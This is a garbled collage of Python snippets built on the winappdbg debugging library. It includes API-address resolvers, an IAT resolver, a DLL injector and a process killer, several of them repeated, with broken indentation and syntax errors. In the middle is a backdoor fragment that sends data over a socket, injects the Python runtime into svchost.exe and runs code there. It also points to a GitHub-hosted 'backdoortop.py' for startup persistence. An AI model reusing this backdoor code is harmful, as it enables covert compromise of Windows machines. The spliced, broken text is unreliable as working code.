def print_api_address(pid, modName, procName):
# Request debug privileges.
System.request_debug_privileges()
# Instance a Process object.
process = Process(pid)
# Lookup it's modules.
process.scan_modules()
# Get the module.
module = process.get_module_by_name(modName)
if not module:
print "Module not found: %s" % modName
return
# Resolve the requested API function address.
address = module.resolve(procName)
# Print the address.
if address:
print "%s!%s == 0x%.08x" % (modName, procName, address)
else:
print "Could not resolve %s in module %s" % (procName, modName)
def print_api_address( pid, modName, procName ):
# Request debug privileges.
System.request_debug_privileges()
# Instance a Process object.
process = Process( pid )
# Lookup it's modules.
process.scan_modules()
# Get the module.
module = process.get_module_by_name( modName )
if not module:
print "Module not found: %s" % modName
return
# Resolve the requested API function address.
address = module.resolve( procName )
# Print the address.
if address:
print "%s!%s == 0x%.08x" % ( modName, procName, address )
else:
print "Could not resolve %s in module %s" % (procName, modName)
def print_label(pid, address):
# Request debug privileges.
System.request_debug_privileges()
# Instance a Process object.
process = Process(pid)
# Lookup it's modules.
process.scan_modules()
# Resolve the requested label address.
label = process.get_label_at_address(address)
# Print the label.
print("%s == 0x%.08x" % (label, address))
def print_label_address( pid, label ):
# Request debug privileges.
System.request_debug_privileges()
# Instance a Process object.
process = Process( pid )
# Lookup it's modules.
process.scan_modules()
# Resolve the requested label address.
address = process.resolve_label( label )
# Print the address.
print "%s == 0x%.08x" % ( label, address )
def reslove_iat_pointers(pid, iat_ptrs):
"""Use winappdbg to resolve IAT pointers to their respective module and function names
@param pid: process ID to connect to
@param iat_ptrs: list of pointer addresses to be resolved
"""
######################################################################
#
# Attach to process and start using winappdbg
#
######################################################################
# Request debug privileges.
System.request_debug_privileges()
# Attach to process
process = Process(pid)
# Lookup the process modules.
process.scan_modules()
# imp_table[ <funct_pointer> ] = [ <module_name>, <function_name> ]
imp_table = {}
for iat_ptr in iat_ptrs:
# For each iat pointer get the function name as a label populated by winappdbg
label = process.get_label_at_address(process.peek_dword(iat_ptr))
module,function,offset = Process.split_label_strict(label)
# Only add functions that have valid labels
if function != None:
imp_table[iat_ptr] = [module, function]
assert len(imp_table) != 0, "Unable to find imports in code!"
######################################################################
#
# Because we may have missed some IAT pointers with our scanner we
# are going to attempt to locate the full mapped IAT directory in the
# section then enumerate ever pointer in the directory. And use that
# list instead.
#
######################################################################
imp_table_new={}
for iat_ptr in range(min(imp_table.keys()), max(imp_table.keys())+4, 4):
# Resolve the requested label address.
label = process.get_label_at_address(process.peek_dword(iat_ptr))
module,function,offset = Process.split_label_strict(label)
if function != None:
imp_table_new[iat_ptr] = [module, function]
return imp_table_new
def main():
print "Process DLL injector"
print "by Mario Vilas (mvilas at gmail.com)"
print
if len(sys.argv) != 3:
script = os.path.basename(sys.argv[0])
print "Injects a DLL into a running process."
print " %s <pid> <library.dll>" % script
print " %s <process.exe> <library.dll>" % script
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except Exception:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print "Process not found: %s" % sys.argv[1]
return
if len(pl) > 1:
print "Multiple processes found for %s" % sys.argv[1]
for p,n in pl:
print "\t%12d: %s" % (p,n)
return
pid = pl[0][0].get_pid()
print "Using PID %d (0x%x)" % (pid, pid)
dll = sys.argv[2]
print "Using DLL %s" % dll
p = Process(pid)
b = p.get_bits()
if b != System.bits:
print (
"Cannot inject into a %d bit process from a %d bit Python VM!"
% (b, System.bits)
)
return
p.scan_modules()
p.inject_dll(dll)
def main():
print("Process DLL injector")
print("by Mario Vilas (mvilas at gmail.com)")
print
if len(sys.argv) != 3:
script = os.path.basename(sys.argv[0])
print("Injects a DLL into a running process.")
print(" %s <pid> <library.dll>" % script)
print(" %s <process.exe> <library.dll>" % script)
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except Exception:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print("Process not found: %s" % sys.argv[1])
return
if len(pl) > 1:
print("Multiple processes found for %s" % sys.argv[1])
for p,n in pl:
print("\t%12d: %s" % (p,n))
return
pid = pl[0][0].get_pid()
print("Using PID %d (0x%x)" % (pid, pid))
dll = sys.argv[2]
print("Using DLL %s" % dll)
p = Process(pid)
b = p.get_bits()
if b != System.bits:
print(()
"Cannot inject into a %d bit process from a %d bit Python VM!"
% (b, System.bits)
)
return
p.scan_modules()
p.inject_dll(dll)
def print_label_address(pid, label):
# Request debug privileges.
System.request_debug_privileges()
# Instance a Process object.
process = Process(pid)
# Lookup it's modules.
process.scan_modules()
# Resolve the requested label address.
address = process.resolve_label(label)
# titles = [i for i in process.search("Trying to change notepad text\0")]
# msg = [k for k in 'New text here ! \0']
# for i in range(len(msg)):
# process.poke(46859072 + i * 2, msg[i].encode())
# Print the address.
print("%s == 0x%.08x" % (label, address))
process.close_handle()
except WindowsError, e:
print "Warning: call to CloseHandle() failed: %s" % str(e)
except WindowsError, e:
print "Warning: call to TerminateProcess() failed: %s" % str(e)
except WindowsError, e:
print "Warning: call to OpenProcess() failed: %s" % str(e)
targets = next_targets
# Try to terminate processes by injecting a call to ExitProcess().
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
process = Process(pid)
process.scan_modules()
try:
module = process.get_module_by_name('kernel32')
pExitProcess = module.resolve('ExitProcess')
try:
process.start_thread(pExitProcess, -1)
next_targets.pop()
count += 1
print "Forced process %d exit" % pid
except WindowsError, e:
print "Warning: call to CreateRemoteThread() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: resolving address of ExitProcess() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: scanning for loaded modules failed %d: %s" % (pid, str(e))
targets = next_targets
process.close_handle()
except WindowsError, e:
print "Warning: call to CloseHandle() failed: %s" % str(e)
except WindowsError, e:
print "Warning: call to TerminateProcess() failed: %s" % str(e)
except WindowsError, e:
print "Warning: call to OpenProcess() failed: %s" % str(e)
targets = next_targets
# Try to terminate processes by injecting a call to ExitProcess().
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
process = Process(pid)
process.scan_modules()
try:
module = process.get_module_by_name('kernel32')
pExitProcess = module.resolve('ExitProcess')
try:
process.start_thread(pExitProcess, -1)
next_targets.pop()
count += 1
print "Forced process %d exit" % pid
except WindowsError, e:
print "Warning: call to CreateRemoteThread() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: resolving address of ExitProcess() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: scanning for loaded modules failed %d: %s" % (pid, str(e))
targets = next_targets
if dados.startswith("pwd"):
s.send("\n"+str(os.getcwd)+"\n")
if os.name == 'nt':
try:
# Injetando codigo
python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor)
python_dll = ctypes.util.find_library(python_lib)
s = System()
s.scan_processes()
pl = s.find_processes_by_filename("svchost.exe")
pid = pl[0][0].get_pid()
p = Process(pid)
print('pid', pid)
print('arch', p.get_bits())
t = p.inject_dll(python_dll)
p.scan_modules()
m = p.get_module_by_name(python_lib)
init = m.resolve("Py_InitializeEx")
pyrun = m.resolve("PyRun_SimpleString")
print(init, pyrun)
p.start_thread(init, 0)
time.sleep(0.1)
sh = 'import subprocess; subprocess.call("svchost.exe")'
addr = p.malloc(len(sh))
p.write(addr, sh)
p.start_thread(pyrun, addr)
# Movendo o backdoor pro startup
if dados.startswith("move_startup"):
url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"
user = getpass.getuser()
def main(argv):
script = os.path.basename(argv[0])
params = argv[1:]
print("Process killer")
print("by Mario Vilas (mvilas at gmail.com)")
print
if len(params) == 0 or '-h' in params or '--help' in params or \
'/?' in params:
print("Usage:")
print(" %s <process ID or name> [process ID or name...]" % script)
print
print(
"If a process name is given instead of an ID all matching processes are killed."
)
exit()
# Scan for active processes.
# This is needed both to translate names to IDs, and to validate the user-supplied IDs.
s = System()
s.request_debug_privileges()
s.scan_processes()
# Parse the command line.
# Each ID is validated against the list of active processes.
# Each name is translated to an ID.
# On error, the program stops before killing any process at all.
targets = set()
for token in params:
try:
pid = HexInput.integer(token)
except ValueError:
pid = None
if pid is None:
matched = s.find_processes_by_filename(token)
if not matched:
print("Error: process not found: %s" % token)
exit()
for (process, name) in matched:
targets.add(process.get_pid())
else:
if not s.has_process(pid):
print("Error: process not found: 0x%x (%d)" % (pid, pid))
exit()
targets.add(pid)
targets = list(targets)
targets.sort()
count = 0
# Try to terminate the processes using the TerminateProcess() API.
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
# Note we don't really need to call open_handle and close_handle,
# but it's good to know exactly which API call it was that failed.
process = Process(pid)
process.open_handle()
try:
process.kill(-1)
next_targets.pop()
count += 1
print("Terminated process %d" % pid)
try:
process.close_handle()
except WindowsError as e:
print("Warning: call to CloseHandle() failed: %s" % str(e))
except WindowsError as e:
print("Warning: call to TerminateProcess() failed: %s" %
str(e))
except WindowsError as e:
print("Warning: call to OpenProcess() failed: %s" % str(e))
targets = next_targets
# Try to terminate processes by injecting a call to ExitProcess().
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
process = Process(pid)
process.scan_modules()
try:
module = process.get_module_by_name('kernel32')
pExitProcess = module.resolve('ExitProcess')
try:
process.start_thread(pExitProcess, -1)
next_targets.pop()
count += 1
print("Forced process %d exit" % pid)
except WindowsError as e:
print(
"Warning: call to CreateRemoteThread() failed %d: %s" %
(pid, str(e)))
except WindowsError as e:
print(
"Warning: resolving address of ExitProcess() failed %d: %s"
% (pid, str(e)))
except WindowsError as e:
print("Warning: scanning for loaded modules failed %d: %s" %
(pid, str(e)))
targets = next_targets
# Attach to every process.
# print(a message on error, but don't stop.)
next_targets = list()
for pid in targets:
try:
win32.DebugActiveProcess(pid)
count += 1
print("Attached to process %d" % pid)
except WindowsError as e:
next_targets.append(pid)
print("Warning: error attaching to %d: %s" % (pid, str(e)))
targets = next_targets
# Try to call the DebugSetProcessKillOnExit() API.
#
# Since it's defined only for Windows XP and above,
# on earlier versions we just ignore the error,
# since the default behavior on those platforms is
# already what we wanted.
#
# This must be done after attaching to at least one process.
#
# http://msdn.microsoft.com/en-us/library/ms679307(VS.85).aspx
try:
win32.DebugSetProcessKillOnExit(True)
except AttributeError:
pass
except WindowsError as e:
print("Warning: call to DebugSetProcessKillOnExit() failed: %s" %
str(e))
if count == 0:
print("Failed! No process was killed.")
elif count == 1:
print("Successfully killed 1 process.")
else:
print("Successfully killed %d processes." % count)
# Exit the current thread.
# This will kill all the processes we have attached to.
exit()
